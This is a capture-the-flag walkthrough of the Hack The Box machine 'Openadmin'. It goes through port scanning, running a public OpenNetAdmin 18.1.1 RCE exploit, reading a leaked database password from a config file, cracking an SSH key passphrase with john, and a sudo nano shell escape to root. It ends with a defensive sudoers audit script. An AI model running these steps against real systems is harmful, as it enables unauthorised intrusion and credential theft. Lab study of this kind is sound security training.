Openadmin - Hack The Box

hackthebox
Author

0xPThree

Published

January 7, 2020



USER

  1. root@p3:/opt/htb/machines/resolute# nmapAutomatorDirb.sh 10.10.10.171 All

    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http

    • http://openadmin.htb/index.html (CODE:200|SIZE:10918)
    • http://openadmin.htb/server-status (CODE:403|SIZE:278)
    • http://openadmin.htb/artwork/index.html (CODE:200|SIZE:14461)
    • http://openadmin.htb/music/index.html (CODE:200|SIZE:12554)
  2. Looking through the websites we find that “Admin” has made a lot of posts on /artwork/blog.html, so this is a possible user. There is also a testimonial from Craig Stephen, another possible user.

    On /music/index.html, pressing the Login button gives us what looks like admin privs for OpenNetAdmin at http://openadmin.htb/ona/. The application is running on version 18.1.1, which is NOT the latest release. A quick Google search shows us that this version has an RCE vulnerability.

  3. Running the RCE script gives us a “shell” as user www-data with limited privs. We are unable to traverse directories, but we can execute commands.

    root@p3:/opt/htb/machines/openadmin# ./ona-expl.sh http://openadmin.htb/ona/
    $ whoami
    www-data

    Enumerating through the folders of /opt/ona/www we find a config file for the database connection, and within it credentials.

    $ cat local/config/database_settings.inc.php
    array (
      'databases' => array (
        0 => array (
          'db_type' => 'mysqli',
          'db_host' => 'localhost',
          'db_login' => 'ona_sys',
          'db_passwd' => 'n1nj4W4rri0R!',
          'db_database' => 'ona_default',
          'db_debug' => false,
        ),
      ),
      'description' => 'Default data context',
      'context_color' => '#D3DBFF',
    ),
    );

    $ ls -al /home/
    total 16
    drwxr-xr-x  4 root   root   4096 Nov 22 18:00 .
    drwxr-xr-x 24 root   root   4096 Nov 21 13:41 ..
    drwxr-x---  6 jimmy  jimmy  4096 Jan  7 06:29 jimmy
    drwxr-x---  6 joanna joanna 4096 Nov 28 09:37 joanna

We got 2 users (jimmy & joanna) and 1 password (n1nj4W4rri0R!)

  1. We are able to SSH in with the credentials jimmy:n1nj4W4rri0R!. Enumerating through the box we find /var/www/internal and within it index.php, main.php and logout.php.

    main.php has some interesting code: if the POSTed username is jimmy and the SHA-512 hash of the password matches a hardcoded hash, a session is set for jimmy and we are able to access main.php.

    <?php
    $msg = '';

    if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
        if ($_POST['username'] == 'jimmy' && hash('sha512', $_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
            $_SESSION['username'] = 'jimmy';
            header("Location: /main.php");
        } else {
            $msg = 'Wrong username or password.';
        }
    }

  2. First we need to find the port this local webserver is running on; we use ss for this.

    jimmy@openadmin:/var/www/internal$ ss -tulpn
    Netid State   Recv-Q Send-Q Local Address:Port    Peer Address:Port
    udp   UNCONN  0      0      127.0.0.53%lo:53      0.0.0.0:*
    tcp   LISTEN  0      80     127.0.0.1:3306        0.0.0.0:*
    tcp   LISTEN  0      128    127.0.0.1:52846       0.0.0.0:*
    tcp   LISTEN  0      128    127.0.0.53%lo:53      0.0.0.0:*
    tcp   LISTEN  0      128    0.0.0.0:22            0.0.0.0:*
    tcp   LISTEN  0      128    *:80                  *:*
    tcp   LISTEN  0      128    [::]:22               [::]:*

    We know all of the ports except 52846, so this is most likely the local webserver. Try to curl it and see if it looks right.

    jimmy@openadmin:/var/www/internal$ curl localhost:52846
    ..
    Enter Username and Password

  3. Trying to log in with the extracted private key prompts for a passphrase, so we need to crack it. The key is in PEM format, so before cracking we need to convert it using ssh2john.

    root@p3:/usr/share/john# python ssh2john.py /opt/htb/machines/openadmin/joanna-id_rsa > /opt/htb/machines/openadmin/hash-joanna
    root@p3:/opt/htb/machines/openadmin# john --wordlist=/usr/share/wordlists/rockyou.txt hash-joanna
    Using default input encoding: UTF-8
    Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
    Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
    Cost 2 (iteration count) is 1 for all loaded hashes
    Will run 12 OpenMP threads
    Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
    Press 'q' or Ctrl-C to abort, almost any other key for status
    bloodninjas      (/opt/htb/machines/openadmin/joanna-id_rsa)
    1g 0:00:00:01 DONE (2020-01-07 14:43) 0.5882g/s 8436Kp/s 8436Kc/s 8436KC/s 0125457423..*7¡Vamos!
    Session completed

    Password for Joanna’s Private Key: bloodninjas

  4. Login as Joanna and grab user.txt

    root@p3:/opt/htb/machines/openadmin# ssh joanna@openadmin.htb -i joanna-id_rsa
    Enter passphrase for key 'joanna-id_rsa': bloodninjas
    joanna@openadmin:~$ cat user.txt
    c9b2****************************

ROOT

  1. sudo -l shows us that we can run “sudo /bin/nano /opt/priv” without a password. Looking at GTFOBins there is a privesc using nano to get a root shell.

    joanna@openadmin:/opt$ sudo /bin/nano /opt/priv

    Press Ctrl+R for “Read File” and then Ctrl+X for “Execute Command”. Next, enter ‘reset; sh 1>&0 2>&0’ to get a shell.

    Command to execute: reset; sh 1>&0 2>&0
    #
    # whoami
    root
    # cat /root/root.txt
    2f90****************************
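The root step works because sudo hands out an interactive editor, and an editor's own "execute command" feature then runs as root. The following POSIX shell audit, added here as an example and not taken from the writeup or from GTFOBins, flags sudo rules that grant editors or pagers of that kind. The function names, the list of programs and the sudoers fragment it is run against are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a sudoers-style file for
# rules that grant interactive editors or pagers. Run under sudo, those programs'
# own "read file" / "execute command" features give the caller a root shell,
# which is exactly the class of rule the nano step above relies on.

# Programs with a built-in way to run a command; all are documented GTFOBins entries.
SHELL_ESCAPE_BINS="nano vim vi view less more man ed emacs"

# audit_sudoers FILE
# Prints each offending rule to stderr and the number of them to stdout (0 = clean).
audit_sudoers() {
    alts=$(printf '%s' "$SHELL_ESCAPE_BINS" | tr ' ' '|')
    # A rule looks like:  user HOST=(RUNAS) [NOPASSWD:] /path/cmd [args], /path/cmd2 ...
    # Match the program as a bare word or as the last path component, preceded by
    # whitespace, ':' (after NOPASSWD:), ')' (after the runas list), '=' or ',',
    # and followed by whitespace, ',' or end of line, so "vi" does not match "vim".
    pattern='(^|[[:space:]:)=,])(/[^[:space:]]*/)?('"$alts"')([[:space:],]|$)'
    # Drop comments and blank lines first so a program name in a comment is not counted.
    hits=$(grep -E -v '^[[:space:]]*(#|$)' "$1" | grep -E -- "$pattern" || true)
    if [ -n "$hits" ]; then
        printf 'shell-escape-capable program granted by sudo rule:\n%s\n' "$hits" >&2
        printf '%s\n' "$hits" | wc -l | tr -d ' '
    else
        echo 0
    fi
}

# make_sample_sudoers
# Writes a constructed sudoers fragment (modelled on the rule seen on the box) to a
# temporary file and prints its path.
make_sample_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not the box's real /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
jimmy   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
deploy  ALL=(root) /usr/bin/vim /etc/deploy.conf, /usr/bin/less /var/log/deploy.log
EOF
    printf '%s\n' "$f"
}

# Demo: the joanna and deploy rules are flagged, so the count printed is 2.
SAMPLE=$(make_sample_sudoers)
audit_sudoers "$SAMPLE"
rm -f "$SAMPLE"
```

Pointed at /etc/sudoers and each file under /etc/sudoers.d (as root), a non-zero count is a rule worth revisiting. The usual fix is to drop the editor grant and use sudoedit (sudo -e) for the one file that needs editing: it runs the editor as the invoking user and only the final copy-back is privileged, so the editor's command features never run as root.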

INFORMATION

OpenNetAdmin 18.1.1 RCE https://packetstormsecurity.com/files/155406/OpenNetAdmin-18.1.1-Remote-Code-Execution.html

GTFOBINS Nano https://gtfobins.github.io/gtfobins/nano/#sudo